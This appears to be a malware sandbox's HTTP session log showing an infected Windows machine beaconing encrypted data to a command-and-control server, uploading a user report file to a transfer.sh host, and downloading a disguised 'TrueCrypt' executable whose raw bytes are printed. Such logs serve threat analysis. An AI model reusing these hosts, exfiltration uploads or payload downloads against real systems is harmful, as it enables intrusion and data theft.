Nov 18, 2023 10:03:22.968334913 CET	67024	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tbfnyxobqor.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 186 Host: 194.49.94.210
Nov 18, 2023 10:03:22.968383074 CET	67024	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af aa d5 f3 c9 39 df 28 fc f4 5c 9a 69 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(\i.t]gz_g'CsX]M8(YpJx:TMB;;xdOC5{3X 8gD,xs6~~@
Nov 18, 2023 10:03:23.286901951 CET	67032	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:23.303277016 CET	67032	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qpdgiqckodsdd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: 194.49.94.210
Nov 18, 2023 10:03:23.303359032 CET	67033	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af ab d5 f3 c9 38 df 28 fc 94 59 ad 4d Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(YMS5`%-.4rY7iuMS$3I+H+g5F#Y?2=\|KS<9HN%3nw:ib^U>to.lhVK Sd3*($Vp&lhu(t$7kn
Nov 18, 2023 10:03:23.617351055 CET	67048	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:23.658828020 CET	67048	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bknwnekkxjnwlw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: 194.49.94.210
Nov 18, 2023 10:03:23.658873081 CET	67048	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a8 d5 f3 c9 38 df 28 fc 88 3a fb 2a Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(:'TndQ#pK@BfB
Nov 18, 2023 10:03:23.971730947 CET	67075	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 53 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 40 92 cc 4f 96 fd ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<@Oj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	52.86.18.77	8080	192.168.2.4	49835	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:23.308811903 CET	67033	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 52.86.18.77:8080 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:03:23.532635927 CET	67033	IN	HTTP/1.1 100 Continue
Nov 18, 2023 10:03:24.610594034 CET	67189	IN	HTTP/1.1 200 OK Content-Type: text/plain Server: Transfer.sh HTTP Server X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders X-Url-Delete: http://52.86.18.77:8080/3YxUsT/42asb_user@813848_report.wsr/vmtVJhkjlpyg Date: Sat, 18 Nov 2023 09:03:24 GMT Content-Length: 60 Data Raw: 68 74 74 70 3a 2f 2f 35 32 2e 38 36 2e 31 38 2e 37 37 3a 38 30 38 30 2f 33 59 78 55 73 54 2f 34 32 61 73 62 5f 6a 6f 6e 65 73 40 38 31 33 38 34 38 5f 72 65 70 6f 72 74 2e 77 73 72 Data Ascii: http://52.86.18.77:8080/3YxUsT/42asb_user@813848_report.wsr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.4	49835	52.86.18.77	8080	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:23.308811903 CET	67033	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 52.86.18.77:8080 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:03:23.532635927 CET	67033	IN	HTTP/1.1 100 Continue
Nov 18, 2023 10:03:24.610594034 CET	67189	IN	HTTP/1.1 200 OK Content-Type: text/plain Server: Transfer.sh HTTP Server X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders X-Url-Delete: http://52.86.18.77:8080/3YxUsT/42asb_user@813848_report.wsr/vmtVJhkjlpyg Date: Sat, 18 Nov 2023 09:03:24 GMT Content-Length: 60 Data Raw: 68 74 74 70 3a 2f 2f 35 32 2e 38 36 2e 31 38 2e 37 37 3a 38 30 38 30 2f 33 59 78 55 73 54 2f 34 32 61 73 62 5f 6a 6f 6e 65 73 40 38 31 33 38 34 38 5f 72 65 70 6f 72 74 2e 77 73 72 Data Ascii: http://52.86.18.77:8080/3YxUsT/42asb_user@813848_report.wsr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	194.49.94.120	80	192.168.2.4	49838	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:24.536875010 CET	67189	OUT	GET /TrueCrypt_ypAWBs.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.120
Nov 18, 2023 10:03:24.835722923 CET	67192	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:24 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 17 Nov 2023 12:04:41 GMT ETag: "108c800-60a57f0f5fb8d" Accept-Ranges: bytes Content-Length: 17352704 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 68 6c 00 00 c4 08 01 00 d2 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 20 10 01 00 04 00 00 c9 2d 09 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 c0 0d 01 4e 00 00 00 00 d0 0d 01 64 13 00 00 00 10 0e 01 08 11 00 00 00 c0 06 01 80 0d 00 00 00 00 00 00 00 00 00 00 00 30 0e 01 fc e3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 06 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 d4 0d 01 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 67 6c 00 00 10 00 00 00 68 6c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 70 b9 06 00 00 80 6c 00 00 ba 06 00 00 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 d0 76 93 00 00 40 73 00 00 78 93 00 00 26 73 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 80 0d 00 00 00 c0 06 01 00 0e 00 00 00 9e 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 90 0b 00 00 00 d0 06 01 00 0c 00 00 00 ac 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 e0 d0 06 00 00 e0 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 c0 0d 01 00 02 00 00 00 b8 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 64 13 00 00 00 d0 0d 01 00 14 00 00 00 ba 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 f0 0d 01 00 02 00 00 00 ce 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 0e 01 00 02 00 00 00 d0 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 08 11 00 00 00 10 0e 01 00 12 00 00 00 d2 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc e3 01 00 00 30 0e 01 00 e4 01 00 00 e4 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hl@ -` Nd0(d(.textpglhl```.dataplll@`.rdatav@sx&s@`@.pdata@0@.xdata@0@.bss`.edataN@0@.idatad@0.CRTp@@.tls@@.rsrc@0.reloc0@0B
Nov 18, 2023 10:03:24.835778952 CET	67193	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 65 9f 06 01 31 c9 c7 00 01 Data Ascii: ff.@H(He1HfHiH,Hf8MZuHcP<H8PEtiHtF\|_lflHelH`kH 8tS1H(@
Nov 18, 2023 10:03:24.835815907 CET	67195	IN	Data Raw: ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 75 9a 06 01 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 a7 5a 6c 00 48 85 c0 0f 94 c0 0f b6 c0 f7 d8 48 83 c4 28 c3 90 90 90 90 90 90 90 48 8d 0d 09 00 00 Data Ascii: H(H(HuH(H(ZlHH(H@I;fv8HHl$Hl$HD$ H\$(fHD$ H\$(,Hl$HHD$H\$sHD$H\$Ld$M;f*HH$H$H
Nov 18, 2023 10:03:24.835854053 CET	67196	IN	Data Raw: 24 1f 44 88 4c 3e 19 48 8b 74 24 78 4c 8b 44 24 50 e9 e0 fb ff ff e8 eb c4 03 00 48 8d 05 6c d9 8a 00 bb 1e 00 00 00 e8 da cd 03 00 48 8b 44 24 60 48 8b 5c 24 48 e8 cb cd 03 00 48 8d 05 ed 82 89 00 bb 02 00 00 00 e8 ba cd 03 00 e8 35 c5 03 00 48 Data Ascii: $DL>Ht$xLD$PHlHD$`H\$HH5Ht$xLD$PA;6ETICH9tHULFH9s(IHADH5L&I9rLLHHHHDHHp
Nov 18, 2023 10:03:24.835890055 CET	67197	IN	Data Raw: 07 01 48 8b 0d d7 15 07 01 48 39 d9 73 37 bf 05 00 00 00 48 8d 35 a6 7b 83 00 e8 a1 fb 04 00 48 89 0d ba 15 07 01 83 3d 53 9c 0c 01 00 75 09 48 89 05 9a 15 07 01 eb 0d 48 8d 3d 91 15 07 01 90 e8 bb f1 06 00 48 89 1d 8c 15 07 01 48 8d 4b fb 48 c1 Data Ascii: HH9s7H5{H=SuHH=HHKHHDfDH<HHRHH[ H4Hv0LM@@LMIPLMR`LM[pL$M$L,M=fuHBHHNHT!ML&HH.
Nov 18, 2023 10:03:24.835926056 CET	67199	IN	Data Raw: 01 d0 89 44 24 08 89 54 24 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 44 24 08 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 59 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 48 08 Data Ascii: D$T$D$I;fvYH Hl$Hl$HHHH0fH9Ku-HxH9{u#x@8{uxf@8{uHHO1Hl$H HD$H\$rHD$H\$I;fH(Hl$ Hl$ HD$0H\$81HL$HH\$8HD$0H
Nov 18, 2023 10:03:24.835963964 CET	67200	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c1 48 d1 e8 48 ba 55 55 55 55 55 55 55 55 48 21 d0 48 21 ca 48 8d 0c 02 48 89 ca 48 c1 e9 02 48 bb 33 33 33 33 33 33 33 33 48 21 d9 48 21 d3 48 01 d9 48 89 ca 48 c1 e9 04 48 01 d1 Data Ascii: HHHUUUUUUUUH!H!HHHH33333333H!H!HHHHHH!HHHHHHHH HL$@M;fMH@H$8H$8H$HH~
Nov 18, 2023 10:03:24.836000919 CET	67201	IN	Data Raw: e8 09 c1 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb bd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 52 02 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 7c 24 68 31 d2 Data Ascii: HD$H\$I;fRHHHl$@Hl$@HD$PH\|$h1E1MHDiFCML9IAAEEHEEHEEH1E1L^EiD,0G,LI9~H9wH\$XHD$PLD$8HL$`H\|$hDT$T
Nov 18, 2023 10:03:24.836055994 CET	67203	IN	Data Raw: c4 e2 06 00 48 89 f8 48 89 d9 e8 79 e2 06 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 0f 1f 40 00 e8 db bb 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 a2 fd ff ff cc cc 48 89 44 24 08 31 c9 31 d2 eb Data Ascii: HHyHD$H\$HL$H\|$ @HD$H\$HL$H\|$ HD$114LB@8IDHH9HHD$11<LF@8IDHH9H=<tH?H
Nov 18, 2023 10:03:24.836091995 CET	67204	IN	Data Raw: cc cc 80 3d 03 8b 0c 01 01 74 05 e9 d2 06 00 00 48 8b 74 24 08 48 8b 5c 24 10 8a 44 24 20 4c 8d 44 24 28 e9 5a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d c3 8a 0c 01 01 74 05 e9 f2 06 00 00 48 8b Data Ascii: =tHt$H\$D$ LD$(Z=tHt$H\$D$LD$ HH@=hthH@oooVo_of oo ov0o0ftftftftffffH@
Nov 18, 2023 10:03:25.134943008 CET	67207	IN	Data Raw: 08 48 8b 54 24 10 4c 8b 44 24 20 48 8b 44 24 28 49 89 fa 4c 8d 5c 24 38 e9 df fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 7c 24 08 48 8b 54 24 10 4c 8b 44 24 18 48 8b 44 24 20 49 89 Data Ascii: HT$LD$ HD$(IL\$8H\|$HT$LD$HD$ IL\$(fHnf`f`fpH\|THH HDoftfu%HH9rHoftfuIH)HI8HtHFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.4	49838	194.49.94.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:24.536875010 CET	67189	OUT	GET /TrueCrypt_ypAWBs.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.120
Nov 18, 2023 10:03:24.835722923 CET	67192	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:24 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 17 Nov 2023 12:04:41 GMT ETag: "108c800-60a57f0f5fb8d" Accept-Ranges: bytes Content-Length: 17352704 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 68 6c 00 00 c4 08 01 00 d2 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 20 10 01 00 04 00 00 c9 2d 09 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 c0 0d 01 4e 00 00 00 00 d0 0d 01 64 13 00 00 00 10 0e 01 08 11 00 00 00 c0 06 01 80 0d 00 00 00 00 00 00 00 00 00 00 00 30 0e 01 fc e3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 06 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 d4 0d 01 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 67 6c 00 00 10 00 00 00 68 6c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 70 b9 06 00 00 80 6c 00 00 ba 06 00 00 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 d0 76 93 00 00 40 73 00 00 78 93 00 00 26 73 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 80 0d 00 00 00 c0 06 01 00 0e 00 00 00 9e 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 90 0b 00 00 00 d0 06 01 00 0c 00 00 00 ac 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 e0 d0 06 00 00 e0 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 c0 0d 01 00 02 00 00 00 b8 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 64 13 00 00 00 d0 0d 01 00 14 00 00 00 ba 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 f0 0d 01 00 02 00 00 00 ce 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 0e 01 00 02 00 00 00 d0 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 08 11 00 00 00 10 0e 01 00 12 00 00 00 d2 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc e3 01 00 00 30 0e 01 00 e4 01 00 00 e4 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hl@ -` Nd0(d(.textpglhl```.dataplll@`.rdatav@sx&s@`@.pdata@0@.xdata@0@.bss`.edataN@0@.idatad@0.CRTp@@.tls@@.rsrc@0.reloc0@0B
Nov 18, 2023 10:03:24.835778952 CET	67193	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 65 9f 06 01 31 c9 c7 00 01 Data Ascii: ff.@H(He1HfHiH,Hf8MZuHcP<H8PEtiHtF\|_lflHelH`kH 8tS1H(@
Nov 18, 2023 10:03:24.835815907 CET	67195	IN	Data Raw: ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 75 9a 06 01 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 a7 5a 6c 00 48 85 c0 0f 94 c0 0f b6 c0 f7 d8 48 83 c4 28 c3 90 90 90 90 90 90 90 48 8d 0d 09 00 00 Data Ascii: H(H(HuH(H(ZlHH(H@I;fv8HHl$Hl$HD$ H\$(fHD$ H\$(,Hl$HHD$H\$sHD$H\$Ld$M;f*HH$H$H
Nov 18, 2023 10:03:24.835854053 CET	67196	IN	Data Raw: 24 1f 44 88 4c 3e 19 48 8b 74 24 78 4c 8b 44 24 50 e9 e0 fb ff ff e8 eb c4 03 00 48 8d 05 6c d9 8a 00 bb 1e 00 00 00 e8 da cd 03 00 48 8b 44 24 60 48 8b 5c 24 48 e8 cb cd 03 00 48 8d 05 ed 82 89 00 bb 02 00 00 00 e8 ba cd 03 00 e8 35 c5 03 00 48 Data Ascii: $DL>Ht$xLD$PHlHD$`H\$HH5Ht$xLD$PA;6ETICH9tHULFH9s(IHADH5L&I9rLLHHHHDHHp
